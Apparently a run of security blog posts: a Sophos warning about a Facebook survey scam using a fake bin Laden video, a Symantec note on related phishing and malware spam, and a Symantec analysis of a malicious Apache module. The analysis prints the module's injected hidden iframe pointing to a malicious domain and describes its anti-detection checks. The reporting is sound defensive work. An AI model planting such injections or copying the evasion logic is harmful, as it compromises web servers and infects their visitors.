Osama Shoot down video scam spreads on Facebook

Facebook users are being tempted to click on links to what purports to be a video of Osama bin Laden being shot, in the latest scam to exploit the hot news story of the Al Qaeda leader’s death.

The messages appear as follows:

Osama shoot down video

Watch the Osama Shoot down video

Osama Dead - Censored Video Leaked
on.fb.me
Osama is dead, watch this exclusive CNN video which was censored by Obama Administration due to level of violence, a must watch. Leaked by Wikileaks.

Clicking on the link, however, will not instantly show you some sensational footage of US Navy Seals attacking Osama bin Laden’s compound in Pakistan.

Instead, you’re told you will have to take an online survey.

Osama shoot down video scam

That should be enough to set your alarm bells ringing – as survey scams are a persisting problem on Facebook, earning scammers commission with every survey they manage to trick users into completing.

What’s most interesting about this scam is that they trick you into cutting-and-pasting a line of JavaScript into your web browser’s address bar.

Not that you’ll realise that you’re doing that, of course. As far as you know all you’re doing is following a sequence of instructions and keyboard presses before you watch the video.

Osama shoot down video scam

But any time you paste a script into your browser’s address bar, you’re effectively running code written by the scammers without the safety net of protection.

Script

Before you know it, you’ll be sharing the news of the “Osama Shoot down video” with all of your Facebook friends, and the scam will be spreading virally.

My guess is that you don’t want to make it so easy for the scammers to run their scripts on your browser – so don’t fall for scams like this.

Be very careful not to be fooled by scams related to Osama Bin Laden’s death, not just on Facebook but on other parts of the internet too. Such a big news story always seems to attract the interest of fraudsters and malware authors.

If you want to keep up-to-date on the latest scams, and are a member of Facebook, don’t forget to join the Sophos Facebook page to keep informed about the latest security news.

Malware and Phishing Attacks Flourish Following News of Osama’s Death

The first spam using the news of Osama Bin Laden’s death was seen in the wild within three hours of the event—Symantec reported this spam activity along with other spam samples in a blog entitled “Osama Dead” is No Longer a Hoax. As anticipated, we started observing a rise in malicious and phishing attacks.

Phishing attacks usually target big brands. In one such phishing attack capitalizing on Bin Laden news, spammers targeted CNN Mexico. The spam email contains a link to bogus “photos and uncensored videos” and redirects users to a phishing site:

The phishing site shows an auto-running Bin Laden related video in an iframe and asks the user to click on a link to download a “complete” video. Clicking on that link forces the download of an .exe file that is detected as Downloader:

Currently, our decoy probes are receiving multiple malicious spam samples in Portuguese, French, and Spanish. The links in this spam email dump Downloader onto the victim’s machine, which in turn downloads the actual malware. Further analysis of these attacks shows that most of the malicious attacks have originated from Brazil, Europe, and the U.S. Below are a few of the subject lines used in these malicious attacks, which refer to videos and photos of Osama Bin Laden:

Spammers are making an effort to not only push the messages into users’ inboxes, but also getting them to open and install the executable payload. Symantec provides multilayer protection—such as antispam, antivirus, and reputation services—to fend off these types of attacks. The links provided in the samples discussed above are tested in Norton Safe Web, which delivers Norton Warnings and a detailed threat report. Below is the Norton Safe Web report for one of the malware hosting domains:

Users should follow basic security practices and should not open any suspicious links or attachments received in unsolicited emails. Use message security and antivirus solutions from Symantec and frequently update your security software, which protects you from potential online viruses and scams.

Note: My thanks to Anand Muralidharan and Amit Kulkarni for contributed content.

Extending Apache to Serve Malware

We recently analyzed the source code of a malicious Apache Web server module that was using Apache filter functionality to infect HTML pages. This is a more active, complex, and unusual attack than simply infecting static Web pages on a Web server. The attack was unusual in that the Web server itself was the infection target. When a Web server is infected like this, every user that requests any Web page from that Web server is a potential victim. This is opposed to cases where static Web pages are infected with malicious code—only those specific pages put a user at risk of infection.

Symantec has a number of detections for HTML pages that have been modified to include links to malicious websites. Trojan.Maliframe!html, Trojan.Webkit!html, and Trojan.Malscript!html are three such examples of detections for clean Web pages that have been modified to include HTML or JavaScript code used to redirect users to malicious websites. A number of threats contain functionality to infect HTML pages to further their propagation, including W32.Ramnit, W32.Fujacks.CE, and W32.Virut.CF, among others. This type of infection typically targets Web pages that are already present on a compromised Web server.

Apache is currently one of the most popular Web servers in use today and can be deployed on Windows and Unix-based operating systems. Apache’s core functionality can be extended through the use of its APIs. Two powerful features of Apache’s API libraries that can be used to add functionality to the Web server are the Apache module APIs and the Apache Filtering framework. These programming interfaces and frameworks allow independent developers to add new functionality to the Apache Web server without modifying or recompiling the code base of the Web server. Apache’s filter API also allows for the extension of functionality by allowing programmers to inspect and alter data that is sent to and from the Web server.  A hosting company that includes advertisements in its client’s Web pages can make use of this type of output filter.  A client creates a Web page on the Web server, and when that page is requested the output filter automatically adds an advertisement to the end of the page. The Web server is inspecting and modifying the outgoing data on-the-fly to add advertisements to its client’s Web pages, generating revenue to support its services.

We have discovered a malicious module that performs identical steps in order to include links to malicious websites. All of the actions performed by the rogue module are done using legitimate code provided by the Apache API, specifically for this type of on-the-fly content generation. This is not an exploit or a hack of Apache’s code base; the module uses Apache’s inherent functionality to infect users and attempts to redirect them to a malicious Web page.

We decided to deploy the infected module on a Linux host running Apache to capture a full output of the malware’s activity. As luck would have it, the authors of the original malware very kindly left a debug output option in their source code. This option, when activated, logged all of the module’s activity to /var/tmp/lol. In order to capture a full run of the malware we created two dummy Web pages that were served from the localhost IP (127.0.0.1) named index.html and second.html. The files contained links to each other to ease navigation back and forth between the files.

We determined from our analysis that the infection module does not infect pages blindly and includes a number of checks for User-Agents, IPs, and administrator processes, that it is not interested in infecting. During a typical execution of the module, the following steps occur:

  1. A user connects to the compromised Web server running the rogue module and requests a Web page.
  2. The rogue module checks the type of content requested by the user.
  3. Once an HTML Web page has been requested, the rogue module begins its infection process.
  4. The rogue module now performs a number of anti-detection checks, including:
    • Checks for the presence of an admin user or process
    • Checks for a number of blacklisted browser user-agents
    • Checks for bad IP ranges (known search engine IP ranges, this prevents the rogue module serving infected pages to search engines, avoiding potential page blocking).
    • Checks for banned IPs.
  5. Once the anti-detection checks have passed successfully the rogue module creates a new session for the target browser, but does not infect it right away.
  6. On a subsequent request for a Web page the infection executes.
  7. The rogue module will then query an external Command and Control server for a new iframe tag.
  8. Once an active iframe tag has been requested, it is inserted into the requested Web page and served to the user.
  9. The user’s IP is then added to a temporary ban list to prevent multiple infections and further hamper detection.

 The injected iframe tag has the following format:

<style>
.nhie96r8 {
position:absolute;
left:-1140px;
top:-1003px
}
</style>

<div class="nhie96r8">
<iframe src=
" [http://]crocabhysanr4.cz.cc/myi986px/count[REMOVED]">
</iframe>
</div> 

In our testing on computers not running antivirus software, we found the malicious iframe tag’s goal was to exploit the user’s browser and install fake antivirus software.

This is a complex and potentially difficult threat to detect accurately. As the rogue module contains a number of evasion techniques, it is possible that a system administrator would not notice the infection for some time. A further difficulty in detecting the threat is the on-the-fly nature of the infection. Since no Web pages are infected on the disk, no detections on stored HTML pages are possible. The threat also blacklists a large number of search engine related IP addresses to prevent serving infected pages to search engine crawlers and exposing the infection to automated detection processes.

Due to the nature of the compile and installation process for a module of this type, the spread of the infection is low risk. The rogue module is not a major concern from a security standpoint as a system administrator level of access is required to install the module. If an attacker has gained the level of control required to install this module on to your Web server, the chances are good that you have much bigger problems to worry about.

Symantec currently detects the infected Apache module as Trojan.Apmod and the infected HTML pages as Trojan.Malscript!html.

Many thanks to Min Ju (Symantec ) and Chad Gough (4Discovery) for bringing this to our attention.